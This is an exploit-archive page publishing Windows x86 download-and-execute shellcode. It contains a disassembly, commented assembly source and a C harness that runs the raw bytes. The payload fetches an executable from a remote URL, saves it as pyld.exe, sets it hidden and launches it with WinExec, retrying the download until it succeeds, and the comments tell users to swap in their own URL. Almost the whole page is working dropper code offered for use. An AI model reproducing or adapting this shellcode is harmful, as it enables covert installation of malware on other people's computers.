Windows x86 URLDownloadToFileA()+SetFileAttributesA()+WinExec()+ExitProcess() Shellcode



EKU-ID: 5693 CVE: OSVDB-ID:
Author: Roziul Hasan Khan Shifat Published: 2016-07-14 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


/*
    Title : Windows x86 URLDownloadToFileA()+SetFileAttributesA()+WinExec()+ExitProcess() shellcode
    Date : 12-07-2016
    Author : Roziul Hasan Khan Shifat
    Tested on: Windows 7 x86
 
 
*/
 
/*
 
 
Disassembly of section .text:
 
00000000 <_start>:
   0:   31 c9                   xor    %ecx,%ecx
   2:   64 8b 41 30             mov    %fs:0x30(%ecx),%eax
   6:   8b 40 0c                mov    0xc(%eax),%eax
   9:   8b 70 14                mov    0x14(%eax),%esi
   c:   ad                      lods   %ds:(%esi),%eax
   d:   96                      xchg   %eax,%esi
   e:   ad                      lods   %ds:(%esi),%eax
   f:   8b 48 10                mov    0x10(%eax),%ecx
  12:   8b 59 3c                mov    0x3c(%ecx),%ebx
  15:   01 cb                   add    %ecx,%ebx
  17:   8b 5b 78                mov    0x78(%ebx),%ebx
  1a:   01 cb                   add    %ecx,%ebx
  1c:   8b 73 20                mov    0x20(%ebx),%esi
  1f:   01 ce                   add    %ecx,%esi
  21:   31 d2                   xor    %edx,%edx
 
00000023 <count>:
  23:   42                      inc    %edx
  24:   ad                      lods   %ds:(%esi),%eax
  25:   01 c8                   add    %ecx,%eax
  27:   81 38 47 65 74 50       cmpl   $0x50746547,(%eax)
  2d:   75 f4                   jne    23 <count>
  2f:   81 78 04 72 6f 63 41    cmpl   $0x41636f72,0x4(%eax)
  36:   75 eb                   jne    23 <count>
  38:   81 78 08 64 64 72 65    cmpl   $0x65726464,0x8(%eax)
  3f:   75 e2                   jne    23 <count>
  41:   8b 73 1c                mov    0x1c(%ebx),%esi
  44:   01 ce                   add    %ecx,%esi
  46:   8b 14 96                mov    (%esi,%edx,4),%edx
  49:   01 ca                   add    %ecx,%edx
  4b:   31 f6                   xor    %esi,%esi
  4d:   89 d6                   mov    %edx,%esi
  4f:   89 cf                   mov    %ecx,%edi
  51:   31 c0                   xor    %eax,%eax
  53:   50                      push   %eax
  54:   68 61 72 79 41          push   $0x41797261
  59:   68 4c 69 62 72          push   $0x7262694c
  5e:   68 4c 6f 61 64          push   $0x64616f4c
  63:   54                      push   %esp
  64:   51                      push   %ecx
  65:   ff d2                   call   *%edx
  67:   83 c4 0c                add    $0xc,%esp
  6a:   31 c9                   xor    %ecx,%ecx
  6c:   68 6c 6c 41 41          push   $0x41416c6c
  71:   88 4c 24 02             mov    %cl,0x2(%esp)
  75:   68 6f 6e 2e 64          push   $0x642e6e6f
  7a:   68 75 72 6c 6d          push   $0x6d6c7275
  7f:   54                      push   %esp
  80:   ff d0                   call   *%eax
  82:   83 c4 0c                add    $0xc,%esp
  85:   31 c9                   xor    %ecx,%ecx
  87:   68 65 41 42 42          push   $0x42424165
  8c:   88 4c 24 02             mov    %cl,0x2(%esp)
  90:   68 6f 46 69 6c          push   $0x6c69466f
  95:   68 6f 61 64 54          push   $0x5464616f
  9a:   68 6f 77 6e 6c          push   $0x6c6e776f
  9f:   68 55 52 4c 44          push   $0x444c5255
  a4:   54                      push   %esp
  a5:   50                      push   %eax
  a6:   ff d6                   call   *%esi
  a8:   83 c4 14                add    $0x14,%esp
  ab:   50                      push   %eax
 
000000ac <download>:
  ac:   58                      pop    %eax
  ad:   31 c9                   xor    %ecx,%ecx
  af:   51                      push   %ecx
  b0:   68 2e 65 78 65          push   $0x6578652e
  b5:   68 6d 70 6c 65          push   $0x656c706d
  ba:   68 30 2f 73 61          push   $0x61732f30
  bf:   68 36 2e 31 33          push   $0x33312e36
  c4:   68 36 38 2e 38          push   $0x382e3836
  c9:   68 39 32 2e 31          push   $0x312e3239
  ce:   68 3a 2f 2f 31          push   $0x312f2f3a
  d3:   68 68 74 74 70          push   $0x70747468
  d8:   54                      push   %esp
  d9:   59                      pop    %ecx
  da:   31 db                   xor    %ebx,%ebx
  dc:   53                      push   %ebx
  dd:   68 2e 65 78 65          push   $0x6578652e
  e2:   68 70 79 6c 64          push   $0x646c7970
  e7:   54                      push   %esp
  e8:   5b                      pop    %ebx
  e9:   31 d2                   xor    %edx,%edx
  eb:   50                      push   %eax
  ec:   52                      push   %edx
  ed:   52                      push   %edx
  ee:   53                      push   %ebx
  ef:   51                      push   %ecx
  f0:   52                      push   %edx
  f1:   ff d0                   call   *%eax
  f3:   59                      pop    %ecx
  f4:   83 c4 2c                add    $0x2c,%esp
  f7:   31 d2                   xor    %edx,%edx
  f9:   39 d0                   cmp    %edx,%eax
  fb:   51                      push   %ecx
  fc:   75 ae                   jne    ac <download>
  fe:   5a                      pop    %edx
  ff:   31 d2                   xor    %edx,%edx
 101:   68 73 41 42 42          push   $0x42424173
 106:   88 54 24 02             mov    %dl,0x2(%esp)
 10a:   68 62 75 74 65          push   $0x65747562
 10f:   68 74 74 72 69          push   $0x69727474
 114:   68 69 6c 65 41          push   $0x41656c69
 119:   68 53 65 74 46          push   $0x46746553
 11e:   54                      push   %esp
 11f:   57                      push   %edi
 120:   ff d6                   call   *%esi
 122:   83 c4 14                add    $0x14,%esp
 125:   31 c9                   xor    %ecx,%ecx
 127:   51                      push   %ecx
 128:   68 2e 65 78 65          push   $0x6578652e
 12d:   68 70 79 6c 64          push   $0x646c7970
 132:   54                      push   %esp
 133:   59                      pop    %ecx
 134:   31 d2                   xor    %edx,%edx
 136:   83 c2 02                add    $0x2,%edx
 139:   52                      push   %edx
 13a:   51                      push   %ecx
 13b:   ff d0                   call   *%eax
 13d:   83 c4 08                add    $0x8,%esp
 140:   31 c9                   xor    %ecx,%ecx
 142:   68 78 65 63 41          push   $0x41636578
 147:   88 4c 24 03             mov    %cl,0x3(%esp)
 14b:   68 57 69 6e 45          push   $0x456e6957
 150:   54                      push   %esp
 151:   57                      push   %edi
 152:   ff d6                   call   *%esi
 154:   83 c4 08                add    $0x8,%esp
 157:   31 c9                   xor    %ecx,%ecx
 159:   51                      push   %ecx
 15a:   68 2e 65 78 65          push   $0x6578652e
 15f:   68 70 79 6c 64          push   $0x646c7970
 164:   54                      push   %esp
 165:   59                      pop    %ecx
 166:   31 d2                   xor    %edx,%edx
 168:   52                      push   %edx
 169:   51                      push   %ecx
 16a:   ff d0                   call   *%eax
 16c:   83 c4 08                add    $0x8,%esp
 16f:   31 c9                   xor    %ecx,%ecx
 171:   68 65 73 73 41          push   $0x41737365
 176:   88 4c 24 03             mov    %cl,0x3(%esp)
 17a:   68 50 72 6f 63          push   $0x636f7250
 17f:   68 45 78 69 74          push   $0x74697845
 184:   54                      push   %esp
 185:   57                      push   %edi
 186:   ff d6                   call   *%esi
 188:   ff d0                   call   *%eax
 
 
*/
 
 
 
/*
 
section .text
    global _start
_start:
 
xor ecx,ecx
mov eax,[fs:ecx+0x30] ;Eax=PEB
mov eax,[eax+0xc] ;eax=PEB.Ldr
mov esi,[eax+0x14] ;esi=PEB.Ldr->InMemOrderModuleList
lodsd
xchg esi,eax
lodsd
mov ecx,[eax+0x10] ;ecx=kernel32.dll base address
;------------------------------------
 
mov ebx,[ecx+0x3c] ;kernel32.dll +0x3c=DOS->e_flanew
add ebx,ecx ;ebx=PE HEADER
mov ebx,[ebx+0x78];Data_DIRECTORY->VirtualAddress
add ebx,ecx ;IMAGE_EXPORT_DIRECTORY
 
mov esi,[ebx+0x20] ;AddressOfNames
add esi,ecx
;------------------------------------------
xor edx,edx
 
count:
inc edx
lodsd
add eax,ecx
cmp dword [eax],'GetP'
jnz count
cmp dword [eax+4],'rocA'
jnz count
cmp dword [eax+8],'ddre'
jnz count
 
;---------------------------------------------
 
mov esi,[ebx+0x1c] ;AddressOfFunctions
add esi,ecx
 
mov edx,[esi+edx*4]
add edx,ecx ;edx=GetProcAddress()
 
;-----------------------------------------
 
xor esi,esi
mov esi,edx ;GetProcAddress()
mov edi,ecx ;kernel32.dll
 
;------------------------------------
;finding address of LoadLibraryA()
xor eax,eax
push eax
push 0x41797261
push 0x7262694c
push 0x64616f4c
 
push esp
push ecx
 
call edx
 
;------------------------
add esp,12
;-----------------------------
 
;LoadLibraryA("urlmon.dll")
xor ecx,ecx
 
push 0x41416c6c
mov [esp+2],byte cl
push 0x642e6e6f
push 0x6d6c7275
 
push esp
call eax
 
;-----------------------
 
add esp,12
;-----------------------
;finding address of URLDownloadToFileA()
xor ecx,ecx
push 0x42424165
mov [esp+2],byte cl
push 0x6c69466f
push 0x5464616f
push 0x6c6e776f
push 0x444c5255
 
push esp
push eax
call esi
 
;------------------------
add esp,20
push eax
;---------------------------------------
;URLDownloadToFileA(NULL,url,save as,0,NULL)
download:
pop eax
xor ecx,ecx
push ecx
 
;-----------------------------
;change it to file url
 
push 0x6578652e
push 0x656c706d
push 0x61732f30
push 0x33312e36
push 0x382e3836
push 0x312e3239
push 0x312f2f3a
push 0x70747468
;-----------------------------------
 
 
push esp
pop ecx ;url http://192.168.86.130/sample.exe
 
xor ebx,ebx
push ebx
 
;------------------------
;save as (no need change it.if U want to change it,do it)
push 0x6578652e
push 0x646c7970
;-------------------------------
push esp ;pyld.exe
pop ebx ;save as
 
xor edx,edx
push eax
push edx
push edx
push ebx
push ecx
push edx
 
call eax
 
;-------------------------
 
pop ecx
add esp,44
xor edx,edx
cmp eax,edx
push ecx
jnz download ;if it fails to download , retry contineusly
;------------------
pop edx
 
;-----------------------
;Finding address of SetFileAttributesA()
xor edx,edx
 
 
push 0x42424173
mov [esp+2],byte dl
push 0x65747562
push 0x69727474
push 0x41656c69
push 0x46746553
 
push esp
push edi
 
call esi
 
;--------------------------------
 
add esp,20 ;U must adjust stack or it will crash
;--------------------
;calling SetFileAttributesA("pyld.exe",FILE_ATTRIBUTE_HIDDEN)
xor ecx,ecx
push ecx
push 0x6578652e
push 0x646c7970
 
push esp
pop ecx
 
xor edx,edx
add edx,2 ;FILE_ATTRIBUTE_HIDDEN
 
push edx
push ecx
 
call eax
 
;-------------------
 
add esp,8
;---------------------------
 
;finding address of WinExec()
xor ecx,ecx
 
push 0x41636578
mov [esp+3],byte cl
push 0x456e6957
 
push esp
push edi
call esi
 
;----------------------
 
add esp,8
 
;------------------------
;calling WinExec("pyld.exe",0)
xor ecx,ecx
push ecx
push 0x6578652e
push 0x646c7970
 
push esp
pop ecx
 
xor edx,edx
push edx
push ecx
 
call eax
;-------------------------
 
add esp,8
;-----------------------------
 
;finding address of ExitProcess()
xor ecx,ecx
push 0x41737365
mov [esp+3],byte cl
push 0x636f7250
push 0x74697845
 
push esp
push edi
 
call esi
 
;--------------
call eax
 
 
 
*/
 
#include<stdio.h>
#include<string.h>
 
char shellcode[]="\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x31\xf6\x89\xd6\x89\xcf\x31\xc0\x50\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x51\xff\xd2\x83\xc4\x0c\x31\xc9\x68\x6c\x6c\x41\x41\x88\x4c\x24\x02\x68\x6f\x6e\x2e\x64\x68\x75\x72\x6c\x6d\x54\xff\xd0\x83\xc4\x0c\x31\xc9\x68\x65\x41\x42\x42\x88\x4c\x24\x02\x68\x6f\x46\x69\x6c\x68\x6f\x61\x64\x54\x68\x6f\x77\x6e\x6c\x68\x55\x52\x4c\x44\x54\x50\xff\xd6\x83\xc4\x14\x50\x58\x31\xc9\x51\x68\x2e\x65\x78\x65\x68\x6d\x70\x6c\x65\x68\x30\x2f\x73\x61\x68\x36\x2e\x31\x33\x68\x36\x38\x2e\x38\x68\x39\x32\x2e\x31\x68\x3a\x2f\x2f\x31\x68\x68\x74\x74\x70\x54\x59\x31\xdb\x53\x68\x2e\x65\x78\x65\x68\x70\x79\x6c\x64\x54\x5b\x31\xd2\x50\x52\x52\x53\x51\x52\xff\xd0\x59\x83\xc4\x2c\x31\xd2\x39\xd0\x51\x75\xae\x5a\x31\xd2\x68\x73\x41\x42\x42\x88\x54\x24\x02\x68\x62\x75\x74\x65\x68\x74\x74\x72\x69\x68\x69\x6c\x65\x41\x68\x53\x65\x74\x46\x54\x57\xff\xd6\x83\xc4\x14\x31\xc9\x51\x68\x2e\x65\x78\x65\x68\x70\x79\x6c\x64\x54\x59\x31\xd2\x83\xc2\x02\x52\x51\xff\xd0\x83\xc4\x08\x31\xc9\x68\x78\x65\x63\x41\x88\x4c\x24\x03\x68\x57\x69\x6e\x45\x54\x57\xff\xd6\x83\xc4\x08\x31\xc9\x51\x68\x2e\x65\x78\x65\x68\x70\x79\x6c\x64\x54\x59\x31\xd2\x52\x51\xff\xd0\x83\xc4\x08\x31\xc9\x68\x65\x73\x73\x41\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x54\x57\xff\xd6\xff\xd0";
 
main()
{
printf("shellcode length %ld\n",(long)strlen(shellcode));
(* (int(*)()) shellcode) ();
}